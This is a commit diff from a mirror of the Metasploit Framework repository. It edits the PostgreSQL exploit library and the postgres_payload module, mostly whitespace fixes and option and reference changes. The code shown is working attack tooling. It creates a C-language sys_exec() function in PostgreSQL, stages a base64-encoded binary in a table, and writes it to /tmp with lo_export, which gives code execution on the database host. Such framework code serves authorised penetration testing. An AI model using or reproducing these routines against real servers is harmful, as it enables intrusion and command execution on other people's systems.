infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

corrections following on from jlee-r7 comments

bug/bundler_fix
midnitesnake 2012-08-21 23:57:07 +01:00
parent ad2b457fda
commit 5cf7f22a13
2 changed files with 86 additions and 90 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

165
lib/msf/core/exploit/postgres.rb
View File

@ -288,17 +288,16 @@ module Exploit::Remote::Postgres
return true
end
# Creates the function sys_exec() in the pg_temp schema.
def postgres_create_sys_exec_linux(so)
q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{so}', 'sys_exec' language C returns null on null input immutable"
resp = postgres_query(q);
if resp[:sql_error]
print_error "Error creating pg_temp.sys_exec: #{resp[:sql_error]}"
return false
end
return true
end
# Creates the function sys_exec() in the pg_temp schema.
def postgres_create_sys_exec_linux(so)
q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{so}', 'sys_exec' language C returns null on null input immutable"
resp = postgres_query(q);
if resp[:sql_error]
print_error "Error creating pg_temp.sys_exec: #{resp[:sql_error]}"
return false
end
return true
end
# This presumes the pg_temp.sys_exec() udf has been installed, almost
# certainly by postgres_create_sys_exec()
@ -331,80 +330,79 @@ module Exploit::Remote::Postgres
return [tbl,fld,fout,oid]
end
# Takes a local filename and uploads it into a table as a Base64 encoded string.
# Returns an array if successful, false if not.
def postgres_upload_binary_file(fname)
data = postgres_base64_file(fname)
tbl,fld = postgres_create_stager_table
return false unless data && tbl && fld
q = "insert into #{tbl}(#{fld}) values('#{data}')"
resp = postgres_query(q)
if resp[:sql_error]
print_error resp[:sql_error]
return false
end
oid, fout = postgres_write_data_to_disk(tbl,fld)
return false unless oid && fout
return [tbl,fld,fout,oid]
end
# Takes a local filename and uploads it into a table as a Base64 encoded string.
# Returns an array if successful, false if not.
def postgres_upload_binary_file(fname)
data = postgres_base64_file(fname)
tbl,fld = postgres_create_stager_table
return false unless data && tbl && fld
q = "insert into #{tbl}(#{fld}) values('#{data}')"
resp = postgres_query(q)
if resp[:sql_error]
print_error resp[:sql_error]
return false
end
oid, fout = postgres_write_data_to_disk(tbl,fld)
return false unless oid && fout
return [tbl,fld,fout,oid]
end
def postgres_upload_binary_file_elf(fname)
data = Base64.encode64(fname)
tbl,fld = postgres_create_stager_table
return false unless data && tbl && fld
q = "insert into #{tbl}(#{fld}) values('#{data}')"
resp = postgres_query(q)
if resp[:sql_error]
print_error resp[:sql_error]
return false
end
oid, fout = postgres_write_data_to_disk_elf(tbl,fld)
return false unless oid && fout
return [tbl,fld,fout,oid]
end
def postgres_upload_binary_file_elf(fname)
data = Base64.encode64(fname)
tbl,fld = postgres_create_stager_table
return false unless data && tbl && fld
q = "insert into #{tbl}(#{fld}) values('#{data}')"
resp = postgres_query(q)
if resp[:sql_error]
print_error resp[:sql_error]
return false
end
oid, fout = postgres_write_data_to_disk_elf(tbl,fld)
return false unless oid && fout
return [tbl,fld,fout,oid]
end
# Writes b64 data from a table field, decoded, to disk.
def postgres_write_data_to_disk_elf(tbl,fld)
oid = rand(60000) + 1000
fname = "/tmp/" + Rex::Text::rand_text_alpha(8)
queries = [
"select lo_create(#{oid})",
"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
"select lo_export(#{oid}, '#{fname}')"
]
queries.each do |q|
resp = postgres_query(q)
if resp && resp[:sql_error]
print_error "Could not write the library to disk."
print_error resp[:sql_error]
break
end
end
return oid,fname
end
# Writes b64 data from a table field, decoded, to disk.
def postgres_write_data_to_disk_elf(tbl,fld)
oid = rand(60000) + 1000
fname = "/tmp/" + Rex::Text::rand_text_alpha(8)
queries = [
"select lo_create(#{oid})",
"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
"select lo_export(#{oid}, '#{fname}')"
]
queries.each do |q|
resp = postgres_query(q)
if resp && resp[:sql_error]
print_error "Could not write the library to disk."
print_error resp[:sql_error]
break
end
end
return oid,fname
end
# Writes b64 data from a table field, decoded, to disk.
def postgres_write_data_to_disk_linux(tbl,fld)
oid = rand(60000) + 1000
fname = "/tmp/" + Rex::Text::rand_text_alpha(8) + ".so"
queries = [
"select lo_create(#{oid})",
"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
"select lo_export(#{oid}, '#{fname}')"
]
queries.each do |q|
resp = postgres_query(q)
if resp && resp[:sql_error]
print_error "Could not write the library to disk."
print_error resp[:sql_error]
break
end
end
return oid,fname
end
# Writes b64 data from a table field, decoded, to disk.
def postgres_write_data_to_disk_linux(tbl,fld)
oid = rand(60000) + 1000
fname = "/tmp/" + Rex::Text::rand_text_alpha(8) + ".so"
queries = [
"select lo_create(#{oid})",
"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
"select lo_export(#{oid}, '#{fname}')"
]
queries.each do |q|
resp = postgres_query(q)
if resp && resp[:sql_error]
print_error "Could not write the library to disk."
print_error resp[:sql_error]
break
end
end
return oid,fname
end
# Writes b64 data from a table field, decoded, to disk.
@ -433,10 +431,9 @@ module Exploit::Remote::Postgres
[data].pack("m*").gsub(/\r?\n/,"")
end
def postgres_base64_elf(data)
#data = File.open(fname, "rb") {|f| f.read f.stat.size}
[data].pack("m*").gsub(/\r?\n/,"")
end
def postgres_base64_elf(data)
[data].pack("m*").gsub(/\r?\n/,"")
end
# Creates a temporary table to store base64'ed binary data in.

11
modules/exploits/linux/postgres/postgres_payload.rb
View File

@ -40,8 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf',
'URL', 'http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql' # A litte more specific to PostgreSQL
[ 'URL', 'http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt'
]
],
'Platform' => 'unix',
@ -61,13 +60,13 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'Automatic', { } ], # Confirmed on XXX
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 10 2009' # Date of Bernardo's BH Europe paper.
'DisclosureDate' => 'June 5 2007' # Date of Bernardo's BH Europe paper.
))
register_options(
[
OptString.new('BITS',[true,'32/ 64 bit OS',32])
OptString.new('BITS',[true,'The architecture of the operating system X86(32) / or X86_64(64) bit OS','32',['32','64']])
],self.class)
@ -88,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
version = get_version(username,password,database,verbose)
version = get_version(username,password,database)
case version
when :nocompat; print_error "Authentication successful, but not a compatable version."
when :noauth; print_error "Authentication failed."
@ -135,7 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
# A shorter version of do_fingerprint from the postgres_version scanner
# module, specifically looking for versions that valid targets for this
# module.
def get_version(user=nil,pass=nil,database=nil,verbose=false)
def get_version(user=nil,pass=nil,database=nil)
begin
msg = "#{rhost}:#{rport} Postgres -"
password = pass || postgres_password